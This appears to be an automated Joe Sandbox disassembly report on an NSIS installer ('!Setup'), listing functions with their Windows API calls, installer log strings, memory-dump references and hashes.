Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D79,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D79,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00015800,00000064,04602857), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32(0085FA30), ref: 00402387

Strings

PalmBargains, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$PalmBargains$Pop: stack empty
API String ID: 1459762280-3786877017
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32(0085FA30), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.2045829743.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2045816408.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045844559.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2045905557.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2046073188.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

